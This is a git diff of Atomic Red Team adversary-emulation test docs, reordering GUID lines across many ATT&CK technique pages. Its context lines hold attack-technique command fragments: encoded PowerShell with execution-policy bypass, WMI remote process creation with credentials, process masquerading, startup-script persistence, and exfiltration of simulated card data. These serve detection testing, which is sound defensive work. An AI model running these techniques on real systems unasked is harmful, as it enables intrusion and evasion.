## Atomic Test #2 - Invoke-Command - -auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 - Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + **Supported Platforms:** Windows +**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6 + + + #### Inputs: @@ -78,13 +82,15 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
## Atomic Test #3 - WinRM Access with Evil-WinRM - -auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d - An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled + **Supported Platforms:** Windows +**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d + + + #### Inputs: diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md index d7874fa0..efb354ce 100644 --- a/atomics/T1027.001/T1027.001.md +++ b/atomics/T1027.001/T1027.001.md @@ -12,15 +12,17 @@ Binary padding effectively changes the checksum of the file and can also be used
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd - -auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a - Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a + + + #### Inputs: diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md index 0bc19e12..8f8c16f1 100644 --- a/atomics/T1027.002/T1027.002.md +++ b/atomics/T1027.002/T1027.002.md @@ -18,14 +18,16 @@ Utilities used to perform software packing are called packers. Example packers a
## Atomic Test #1 - Binary simply packed by UPX (linux) - -auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. + **Supported Platforms:** Linux +**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4 + + + #### Inputs: @@ -54,16 +56,18 @@ rm /tmp/packed_bin
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux) - -auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. + **Supported Platforms:** Linux +**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1 + + + #### Inputs: @@ -92,14 +96,16 @@ rm /tmp/packed_bin
## Atomic Test #3 - Binary simply packed by UPX - -auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. + **Supported Platforms:** macOS +**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20 + + + #### Inputs: @@ -128,16 +134,18 @@ rm /tmp/packed_bin
## Atomic Test #4 - Binary packed by UPX, with modified headers - -auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. + **Supported Platforms:** macOS +**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d + + + #### Inputs: diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md index 4b1a7bcc..004bcf72 100644 --- a/atomics/T1027.004/T1027.004.md +++ b/atomics/T1027.004/T1027.004.md @@ -14,14 +14,16 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
## Atomic Test #1 - Compile After Delivery using csc.exe - -auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206 - Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206 + + + #### Inputs: @@ -64,16 +66,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Dynamic C# Compile - -auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef - When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'. + **Supported Platforms:** Windows +**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef + + + #### Inputs: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 152fface..e40093ff 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -26,15 +26,17 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
## Atomic Test #1 - Decode base64 Data into Script - -auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb - Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb + + + @@ -57,15 +59,17 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell - -auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6 - Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" + **Supported Platforms:** Windows +**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6 + + + #### Inputs: @@ -94,15 +98,17 @@ powershell.exe -EncodedCommand $EncodedCommand
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry - -auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec - Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec + + + #### Inputs: @@ -139,13 +145,15 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
## Atomic Test #4 - Execution from Compressed File - -auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f - Mimic execution of compressed executable. When successfully executed, calculator.exe will open. + **Supported Platforms:** Windows +**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f + + + #### Inputs: @@ -190,14 +198,16 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email - -auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad - Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. + **Supported Platforms:** Windows +**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad + + + #### Inputs: @@ -225,14 +235,16 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP - -auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 - Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. + **Supported Platforms:** Windows +**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319 + + + #### Inputs: diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 1e1ace1e..77b26949 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Data Transfer Size Limits - -auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a - Take a file/directory, split it into 5Mb chunks + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a + + + #### Inputs: diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index a6b8c381..a491d1e9 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -16,16 +16,18 @@ Utilities and commands that acquire this information include whoami
## Atomic Test #1 - System Owner/User Discovery - -auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa - Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa + + + #### Inputs: @@ -57,15 +59,17 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
## Atomic Test #2 - System Owner/User Discovery - -auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c - Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c + + + @@ -87,13 +91,15 @@ who
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView) - -auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca - Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca + + + diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 9087162b..c2f528f3 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -26,15 +26,17 @@
## Atomic Test #1 - Masquerading as Windows LSASS process - -auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717 - Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session + **Supported Platforms:** Windows +**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717 + + + @@ -59,15 +61,17 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
## Atomic Test #2 - Masquerading as Linux crond process. - -auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 - Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. + **Supported Platforms:** Linux +**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556 + + + @@ -92,15 +96,17 @@ rm /tmp/crond
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe - -auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 - Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0 + + + @@ -125,15 +131,17 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe - -auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 - Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23 + + + @@ -158,15 +166,17 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe - -auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa - Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa + + + @@ -191,15 +201,17 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe - -auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 - Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086 + + + #### Inputs: @@ -244,13 +256,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Masquerading - windows exe running as different windows exe - -auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 - Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe + **Supported Platforms:** Windows +**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0 + + + #### Inputs: @@ -282,16 +296,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
## Atomic Test #8 - Malicious process Masquerading as LSM.exe - -auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f - Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f + + + @@ -317,15 +333,17 @@ del C:\lsm.exe >nul 2>&1
## Atomic Test #9 - File Extension Masquerading - -auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc - download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) + **Supported Platforms:** Windows +**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc + + + #### Inputs: diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md index 7c1348a8..cc23c8db 100644 --- a/atomics/T1036.004/T1036.004.md +++ b/atomics/T1036.004/T1036.004.md @@ -14,13 +14,15 @@ Tasks or services contain other fields, such as a description, that adversaries
## Atomic Test #1 - Creating W32Time similar named service using schtasks - -auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 - Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" + **Supported Platforms:** Windows +**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 + + + @@ -45,13 +47,15 @@ schtasks /tn win32times /delete /f
## Atomic Test #2 - Creating W32Time similar named service using sc - -auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66 - Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" + **Supported Platforms:** Windows +**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66 + + + diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index aab962e3..906ddca2 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -12,13 +12,15 @@ Adversaries may also use the same icon of the file they are trying to mimic. ## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. - -auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 - Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24 + + + #### Inputs: diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md index 72ccf8b3..6a9c6ddc 100644 --- a/atomics/T1036.006/T1036.006.md +++ b/atomics/T1036.006/T1036.006.md @@ -14,13 +14,15 @@ Adversaries can use this feature to trick users into double clicking benign-look
## Atomic Test #1 - Space After Filename - -auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f - Space After Filename + **Supported Platforms:** macOS +**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f + + + #### Run it with these steps! diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index e1e4f50b..7c5ef536 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -12,13 +12,15 @@ Renaming abusable system utilities to evade security monitoring is also a form o
## Atomic Test #1 - System File Copied to Unusual Location - -auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd - It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd + + + diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md index 500ffdb3..40211c19 100644 --- a/atomics/T1037.001/T1037.001.md +++ b/atomics/T1037.001/T1037.001.md @@ -12,14 +12,16 @@ Adversaries may use these scripts to maintain persistence on a single system. De
## Atomic Test #1 - Logon Scripts - -auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. + **Supported Platforms:** Windows +**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231 + + + #### Inputs: diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md index c642506b..145b05de 100644 --- a/atomics/T1037.002/T1037.002.md +++ b/atomics/T1037.002/T1037.002.md @@ -12,13 +12,15 @@ Adversaries may use these login hooks to maintain persistence on a single system
## Atomic Test #1 - Logon Scripts - Mac - -auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - Mac logon script + **Supported Platforms:** macOS +**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4 + + + #### Run it with these steps! diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 94d9c640..d7876f5e 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -20,15 +20,17 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
## Atomic Test #1 - rc.common - -auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de + + + @@ -48,13 +50,15 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
## Atomic Test #2 - rc.common - -auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a - Modify rc.common + **Supported Platforms:** Linux +**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a + + + @@ -82,13 +86,15 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
## Atomic Test #3 - rc.local - -auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 - Modify rc.local + **Supported Platforms:** Linux +**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102 + + + diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md index 516684aa..278fe1fc 100644 --- a/atomics/T1037.005/T1037.005.md +++ b/atomics/T1037.005/T1037.005.md @@ -14,15 +14,17 @@ An adversary can create the appropriate folders/files in the StartupItems direct
## Atomic Test #1 - Add file to Local Library StartupItems - -auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + **Supported Platforms:** macOS +**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198 + + + diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index e2cb05d4..e2076782 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -20,15 +20,17 @@ Network sniffing may also reveal configuration details, such as running services
## Atomic Test #1 - Packet Capture Linux - -auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e - Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + **Supported Platforms:** Linux +**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e + + + #### Inputs: @@ -66,15 +68,17 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #2 - Packet Capture macOS - -auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608 - Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. + **Supported Platforms:** macOS +**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608 + + + #### Inputs: @@ -112,16 +116,18 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #3 - Packet Capture Windows Command Prompt - -auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca - Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". + **Supported Platforms:** Windows +**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca + + + #### Inputs: @@ -173,14 +179,16 @@ Start-Process $env:temp\npcap_installer.exe
## Atomic Test #4 - Windows Internal Packet Capture - -auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528 - Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory + **Supported Platforms:** Windows +**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528 + + + diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index f921f6a0..c97b6af1 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -18,15 +18,17 @@ Within cloud environments, adversaries may attempt to discover services running
## Atomic Test #1 - Port Scan - -auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540 - Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540 + + + @@ -49,15 +51,17 @@ done
## Atomic Test #2 - Port Scan Nmap - -auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f - Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f + + + #### Inputs: @@ -98,13 +102,15 @@ echo "Install nmap on the machine to run the test."; exit 1;
## Atomic Test #3 - Port Scan NMap for Windows - -auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df - Scan ports to check for listening ports for the local host 127.0.0.1 + **Supported Platforms:** Windows +**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df + + + #### Inputs: @@ -143,13 +149,15 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
## Atomic Test #4 - Port Scan using python - -auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c - Scan ports to check for listening ports with python + **Supported Platforms:** Windows +**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c + + + #### Inputs: diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index eb510624..7b2812cb 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -26,14 +26,16 @@ An adversary can use WMI to interact with local and remote systems and use it as
## Atomic Test #1 - WMI Reconnaissance Users - -auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea - An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. + **Supported Platforms:** Windows +**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea + + + @@ -53,14 +55,16 @@ wmic useraccount get /ALL /format:csv
## Atomic Test #2 - WMI Reconnaissance Processes - -auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 - An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. + **Supported Platforms:** Windows +**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2 + + + @@ -80,14 +84,16 @@ wmic process get caption,executablepath,commandline /format:csv
## Atomic Test #3 - WMI Reconnaissance Software - -auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 - An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. + **Supported Platforms:** Windows +**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414 + + + @@ -107,17 +113,19 @@ wmic qfe get description,installedOn /format:csv
## Atomic Test #4 - WMI Reconnaissance List Remote Services - -auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 - An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable + **Supported Platforms:** Windows +**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3 + + + #### Inputs: @@ -143,14 +151,16 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
## Atomic Test #5 - WMI Execute Local Process - -auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 - This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. + **Supported Platforms:** Windows +**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 + + + #### Inputs: @@ -179,15 +189,17 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
## Atomic Test #6 - WMI Execute Remote Process - -auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b - This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable + **Supported Platforms:** Windows +**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b + + + #### Inputs: @@ -219,9 +231,6 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command - -auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c - Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand Where the –EncodedCommand, once decoded, would resemble: @@ -229,9 +238,14 @@ Where the –EncodedCommand, once decoded, would resemble: The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) + **Supported Platforms:** Windows +**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c + + + @@ -251,14 +265,16 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
## Atomic Test #8 - Create a Process using obfuscated Win32_Process - -auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 - This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32) + **Supported Platforms:** Windows +**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43 + + + #### Inputs: diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index 0390ce51..db4db939 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -20,15 +20,17 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP - -auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff - A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff + + + #### Run it with these steps! @@ -56,15 +58,17 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
